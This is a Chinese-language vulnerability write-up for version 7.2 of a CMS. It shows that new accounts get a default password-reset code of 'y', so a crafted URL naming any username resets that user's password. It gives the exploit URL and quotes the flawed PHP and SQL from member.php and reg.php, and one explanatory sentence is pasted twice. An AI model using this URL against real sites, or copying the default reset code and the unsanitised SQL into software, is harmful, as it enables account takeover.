影响版本v7.2
漏洞复现:
注册用户,点击找回密码功能,认证成功后有重置密码响应链接
重置密码链接
注意到其有检验码,但是这个cms存在漏洞,即初始校验码默认为y,所以我们将校验码改为y,username改为yhy2,发现成功修改
http://localhost/member.php?mod=repsw3&repswcode=y&repswname=yhy2
从代码的角度看的话,注意到找回密码的源代码中并不是单纯根据用户名来修改密码,存在认证机制,但是认证机制存在漏洞
/upload/member.php
if($mod=='repsw3'){
require_once('data/admin/smtp.php');
if($smtppsw=='off'){showMsg("抱歉,系统已关闭密码找回功能!","index.php",0,100000);exit();}
$repswname=$_GET['repswname'];
$repswcode=$_GET['repswcode'];//这里对比检验码
if(empty($repswname) OR $repswname==""){showMsg("授权码错误或已过期!","index.php",0,100000);exit();}
if(empty($repswcode) OR $repswcode==""){showMsg("授权码错误或已过期!","index.php",0,100000);exit();}
$row=$dsql->GetOne("select * from sea_member where username='$repswname'");
$repswcode2=$row['repswcode'];
if($repswcode != $repswcode2){showMsg("授权码错误或已过期!","index.php",0,100000);exit();}
echo <<<EOT
<body>
<div class="hy-head-menu">
<div class="container">
<div class="row">
<div class="item">
<div class="logo hidden-xs">
<a class="hidden-sm hidden-xs" href="index.php"><img src="pic/member/logo.png" /></a>
<a class="visible-sm visible-xs" href="index.php"><img src="pic/member/logo_min.png" /></a>
</div>
<div class="search hidden-xs">
<form name="formsearch" id="formsearch" action='search.php' method="post" autocomplete="off">
<input class="form-control" placeholder="输入影片关键词..." name="searchword" type="text" id="keyword" required="">
<input type="submit" id="searchbutton" value="" class="hide">
<a href="javascript:" class="btns" title="搜索" onClick="$('#formsearch').submit();"><i class="icon iconfont icon-search"></i></a>
</form>
</div>
</div>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="hy-member-user hy-layout clearfix">
<div class="item">
<dl class="margin-0 clearfix">
<dt><span class="user"></span></dt>
<dd>
<span class="name">正在找回您的密码<span>
<span class="group">通过电子邮箱找回您的密码<span>
</dd>
</dl>
</div>
</div>
<div class="hy-member hy-layout clearfix">
<form action="?mod=repsw4" method="post"><li class="cckkey"><strong>会员账号:{$repswname}</strong><br><br>新密码:<br></span><input type="password" name="repswnew1" class="form-control" id="repswnew1" value="" style="width:250px;"><br>确认新密码:<br></span><input type="password" name="repswnew2" class="form-control" id="repswnew2" value="" style="width:250px;"> <br><input type="hidden" name="repswname" id="repswname" value="{$repswname}"><input type="hidden" name="repswcode" id="repswcode" value="{$repswcode}"><input type="submit" name="cckb" id="cckb" value="提交" class="btn btn-warning"></li></form>
</div>
</div>
</div>
<div class="tabbar visible-xs">
<a href="/" class="item">返回首页</a>
</div>
<div class="container">
<div class="row">
<div class="hy-footer clearfix">
<p class="text-muted">Copyright ©{$year} {$_SERVER['HTTP_HOST']}</p>
</div>
</div>
</div>
</body>
EOT;
exit();
}
而從注册界面的sql语句就可以知道,这里明显是再初始化用户时将其检验码设置成了y
$dsql->ExecuteNoneQuery("INSERT INTO `sea_member`(id,username,password,email,regtime,regip,state,gid,points,logincount,stime,vipendtime,acode,repswcode,msgstate)
VALUES ('','$username','$pwd','$email','$dtime','$ip','1','2','$regpoints','1','1533686888','$dtime','$acode','y','y')");
而從注册界面的sql语句就可以知道,这里明显是再初始化用户时将其检验码设置成了y
/upload/reg.php
$dsql->ExecuteNoneQuery("INSERT INTO `sea_member`(id,username,password,email,regtime,regip,state,gid,points,logincount,stime,vipendtime,acode,repswcode,msgstate)
VALUES ('','$username','$pwd','$email','$dtime','$ip','1','2','$regpoints','1','1533686888','$dtime','$acode','y','y')");